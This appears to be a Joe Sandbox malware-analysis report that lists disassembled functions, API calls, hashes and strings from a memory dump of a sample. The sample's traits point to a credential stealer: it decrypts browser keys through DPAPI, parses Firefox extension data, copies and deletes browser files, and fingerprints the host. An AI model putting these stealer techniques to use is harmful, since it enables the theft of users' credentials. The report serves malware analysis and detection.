Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 3731072634-738592651
Opcode ID: 641c310c3a4ab24bc3f25281fe877fcc5e821a6704d952bbdbd2869dca132d99
Instruction ID: 27b9d937d1eb2b37959d1b0821c640950517226354c316aa9f1795df4e4508dc
Opcode Fuzzy Hash: 641c310c3a4ab24bc3f25281fe877fcc5e821a6704d952bbdbd2869dca132d99
Instruction Fuzzy Hash: 323152B6D00209ABCF04DBD4DC45AEFB7B8BF58304F44456AE901B7281E7389A54CB6A

Function 00417F90 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417FC7
HeapAlloc.KERNEL32(00000000), ref: 00417FCE
RegOpenKeyExA.KERNEL32(80000002,02D21238,00000000,00020119,?), ref: 00417FEE
RegQueryValueExA.KERNEL32(?,02D25F58,00000000,00000000,000000FF,000000FF), ref: 0041800F
RegCloseKey.ADVAPI32(?), ref: 00418022

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 7a9c0ba5048ddb27ec33de3f8be0389340df971bddb9b3c1683f2c2c2fb7b9da
Instruction ID: 7366865410052b2090c980cb0782fc53e6cc971cacc9a0cbb18d91746b71e1a2
Opcode Fuzzy Hash: 7a9c0ba5048ddb27ec33de3f8be0389340df971bddb9b3c1683f2c2c2fb7b9da
Instruction Fuzzy Hash: 981151B1E45209EBD700CF94DD45FBFBBB9EB48B11F10421AF615A7280E77959048BA2

Function 004012A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
HeapAlloc.KERNEL32(00000000), ref: 004012BB
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 004012D7
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
RegCloseKey.ADVAPI32(?), ref: 004012FF

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 105a35557efbe30c530503ad4a66e3d917ab5a2bcfe7a77369b2bd71da3f475d
Instruction ID: b0bfc99e0bb5f41d030d85d97ebb5ad9faa7414484ca5a523084a8432581bb26
Opcode Fuzzy Hash: 105a35557efbe30c530503ad4a66e3d917ab5a2bcfe7a77369b2bd71da3f475d
Instruction Fuzzy Hash: D1013179E45209BFDB00DFD0DC49FAE7779EB48701F00419AFA05A7280E770AA008B91

Function 0040A7D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(02D1E058,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,?,004102B3), ref: 0040A7ED
LoadLibraryA.KERNEL32(02C9AD40,?,?,?,?,?,?,?,?,?,?,?,004102B3), ref: 0040A876

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,02D1E098,?,004210F4,?,00000000), ref: 0041AB3B
Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

SetEnvironmentVariableA.KERNEL32(02D1E058,00000000,00000000,?,0042137C,?,004102B3,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00420B0A), ref: 0040A862

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 0040A7E2, 0040A7F6, 0040A80C

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-2812842227
Opcode ID: 8db17895786a4d798e5a992c39e95ab3123cf703954dbda09539105b4b2a0dbf
Instruction ID: e2f153a25b0241b5b599166127738bab9ecbab10861abf647739b816a1383ce1
Opcode Fuzzy Hash: 8db17895786a4d798e5a992c39e95ab3123cf703954dbda09539105b4b2a0dbf
Instruction Fuzzy Hash: 63415BB1E0A2049BC704EBA5EC55BAE37B6AB08305F44552BF505A32E0FB386954CB67

Function 0040A990 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,02D21940,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040AA11
lstrlenA.KERNEL32(00000000,00000000), ref: 0040AB2F
lstrlenA.KERNEL32(00000000), ref: 0040ADEC

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D

DeleteFileA.KERNEL32(00000000), ref: 0040AE73

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
String ID:
API String ID: 257331557-0
Opcode ID: b0e318a7f9dc9c02e125d22b7f2b84c26b5044f1f2443ebf9bc60192aa451b14
Instruction ID: 5dfe8597df33c788f82f0551f3ba8d02d272d38f024b71a471f8e3c501a58f6f
Opcode Fuzzy Hash: b0e318a7f9dc9c02e125d22b7f2b84c26b5044f1f2443ebf9bc60192aa451b14
Instruction Fuzzy Hash: A9E134729111089BCB04FBA5DC66EEE7339AF14314F40855EF11672091EF387A9CCB6A

Function 0040D880 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,02D21940,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D901
lstrlenA.KERNEL32(00000000), ref: 0040DA9F
lstrlenA.KERNEL32(00000000), ref: 0040DAB3
DeleteFileA.KERNEL32(00000000), ref: 0040DB32

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: e1541d5a6582b7f71c13c8980ea8c71bf43482d7e837bcf75470da42969070ce
Instruction ID: 660f6b77f2ff2b442eb80c9f7963c7c0f8ff679996332a2a68bd7dee448c32b7
Opcode Fuzzy Hash: e1541d5a6582b7f71c13c8980ea8c71bf43482d7e837bcf75470da42969070ce
Instruction Fuzzy Hash: 28812572E111089BCB04FBA5EC66DEE7339AF14314F40455FF10662095EF387A98CB6A

Function 0040F5A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA

Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421678,00420D93), ref: 0040F64C
lstrlenA.KERNEL32(00000000), ref: 0040F66B

Strings

moz-extension+++, xrefs: 0040F6AD
^userContextId=4294967295, xrefs: 0040F69C

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 998311485-3310892237
Opcode ID: 433237cd24e16ebf6383a581adf13b13bc1abfe05e637d3bf75e5622ce90dd8b
Instruction ID: 3808d15f7e0f9f9184562117c9aa29465858450d569164ac2a98ea8b538c64df
Opcode Fuzzy Hash: 433237cd24e16ebf6383a581adf13b13bc1abfe05e637d3bf75e5622ce90dd8b
Instruction Fuzzy Hash: 42517E72E011089BCB04FBA1ECA6DED7339AF54304F40852EF50667195EF386A5CCB6A

Function 00411C60 Relevance: 6.1, APIs: 2, Strings: 1, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 00417690: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004176D2
Part of subcall function 00417690: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041770F
Part of subcall function 00417690: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417793
Part of subcall function 00417690: HeapAlloc.KERNEL32(00000000), ref: 0041779A

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 00417820: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417834
Part of subcall function 00417820: HeapAlloc.KERNEL32(00000000), ref: 0041783B

Part of subcall function 00417950: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,0041DEF0,000000FF,?,00411EE9,00000000,?,02D260F8,00000000,?), ref: 00417982
Part of subcall function 00417950: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,0041DEF0,000000FF,?,00411EE9,00000000,?,02D260F8,00000000,?), ref: 00417989

Part of subcall function 004179E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
Part of subcall function 004179E0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
Part of subcall function 004179E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F

Part of subcall function 00417A70: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
Part of subcall function 00417A70: HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
Part of subcall function 00417A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF

Part of subcall function 00417B10: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420DE8,00000000,?), ref: 00417B40
Part of subcall function 00417B10: HeapAlloc.KERNEL32(00000000,?,?,?,?,00420DE8,00000000,?), ref: 00417B47
Part of subcall function 00417B10: GetLocalTime.KERNEL32(?,?,?,?,?,00420DE8,00000000,?), ref: 00417B54
Part of subcall function 00417B10: wsprintfA.USER32 ref: 00417B83

Part of subcall function 00417BC0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,02D25760,00000000,?,00420DF8,00000000,?,00000000,00000000), ref: 00417BF3
Part of subcall function 00417BC0: HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,02D25760,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 00417BFA
Part of subcall function 00417BC0: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,02D25760,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 00417C0D

Part of subcall function 00417C90: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,02D25760,00000000,?,00420DF8,00000000,?,00000000,00000000), ref: 00417CC5

Part of subcall function 00417D20: GetKeyboardLayoutList.USER32(00000000,00000000,004205B7), ref: 00417D71
Part of subcall function 00417D20: LocalAlloc.KERNEL32(00000040,?), ref: 00417D89
Part of subcall function 00417D20: GetKeyboardLayoutList.USER32(?,00000000), ref: 00417D9D
Part of subcall function 00417D20: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417DF2
Part of subcall function 00417D20: LocalFree.KERNEL32(00000000), ref: 00417EB2

Part of subcall function 00417F10: GetSystemPowerStatus.KERNEL32(?), ref: 00417F3D

GetCurrentProcessId.KERNEL32(00000000,?,02D25E18,00000000,?,00420E0C,00000000,?,00000000,00000000,?,02D25580,00000000,?,00420E08,00000000), ref: 004122CE

Part of subcall function 00419600: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00419614
Part of subcall function 00419600: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00419635
Part of subcall function 00419600: CloseHandle.KERNEL32(00000000), ref: 0041963F

Part of subcall function 00417F90: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417FC7
Part of subcall function 00417F90: HeapAlloc.KERNEL32(00000000), ref: 00417FCE
Part of subcall function 00417F90: RegOpenKeyExA.KERNEL32(80000002,02D21238,00000000,00020119,?), ref: 00417FEE
Part of subcall function 00417F90: RegQueryValueExA.KERNEL32(?,02D25F58,00000000,00000000,000000FF,000000FF), ref: 0041800F
Part of subcall function 00417F90: RegCloseKey.ADVAPI32(?), ref: 00418022

Part of subcall function 004180F0: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00418159
Part of subcall function 004180F0: GetLastError.KERNEL32 ref: 00418168

Part of subcall function 00418060: GetSystemInfo.KERNEL32(00420E14), ref: 00418090
Part of subcall function 00418060: wsprintfA.USER32 ref: 004180A6

Part of subcall function 00418290: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,02D25700,00000000,?,00420E14,00000000,?,00000000), ref: 004182C0
Part of subcall function 00418290: HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,02D25700,00000000,?,00420E14,00000000,?,00000000,00000000), ref: 004182C7
Part of subcall function 00418290: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 004182E8
Part of subcall function 00418290: __aulldiv.LIBCMT ref: 00418302
Part of subcall function 00418290: __aulldiv.LIBCMT ref: 00418310
Part of subcall function 00418290: wsprintfA.USER32 ref: 0041833C

Part of subcall function 00418950: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E10,00000000,?), ref: 004189BF
Part of subcall function 00418950: HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E10,00000000,?), ref: 004189C6
Part of subcall function 00418950: wsprintfA.USER32 ref: 004189E0

Part of subcall function 004184B0: RegOpenKeyExA.KERNEL32(00000000,02D234B8,00000000,00020019,00000000,004205BE), ref: 00418534

Part of subcall function 004184B0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004185B6
Part of subcall function 004184B0: wsprintfA.USER32 ref: 004185E9
Part of subcall function 004184B0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0041860B
Part of subcall function 004184B0: RegCloseKey.ADVAPI32(00000000), ref: 0041861C
Part of subcall function 004184B0: RegCloseKey.ADVAPI32(00000000), ref: 00418629

Part of subcall function 00418810: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205BF), ref: 0041885A
Part of subcall function 00418810: Process32First.KERNEL32(?,00000128), ref: 0041886E
Part of subcall function 00418810: Process32Next.KERNEL32(?,00000128), ref: 00418883
Part of subcall function 00418810: CloseHandle.KERNEL32(?), ref: 004188F1

lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 004128AB

Strings

aA, xrefs: 004128D4, 00412902, 004128D7

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
